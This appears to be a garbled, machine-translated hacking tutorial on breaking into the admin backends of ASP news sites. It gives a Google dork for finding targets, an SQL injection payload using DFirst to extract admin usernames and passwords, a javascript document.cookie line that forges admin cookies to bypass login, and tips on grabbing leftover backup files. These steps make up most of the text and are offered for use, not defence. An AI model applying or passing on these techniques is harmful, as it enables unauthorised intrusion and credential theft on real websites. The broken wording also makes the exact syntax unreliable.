Using cokiess to fool the management background, google Keyword inurl: news_more.asp? Lm21.adminadmin _ news_pl_view.asp? + Dfirst ([user], [admin]) + chr (124) + dfirst ([pass], [admin]), use
Use cokiess to fool the management backend. google Keyword inurl: news _More. Asp? Lm2 =
1.
/Admin/admin_news_pl_view.asp?Id= 1
// Enter the following statement as the id.
2. When the error message is displayed on the "1" page, the system continues to move back to "2, 3, 4 ....
3. | '+DfIrst ("[user]", "[admin]") + chr (124) + dfirst ("[pass]", "[admin]"), username ='
4. javascript: alert (document. cookie = "adminuser =" + escape ("admin"); alert (document. cookie = "adminpass =" + escape ("change here "));
5. Modify the preceding cookies to cheat the backend ~
Generally, login. asp can be used in the admin directory at the same level. You can use the previous three axes for other messages. An eweb can be used to list directories ~
When there is backup in the background, try to open the file in the browser and write the backup name directly. Some just remove the backup name and the file is still there...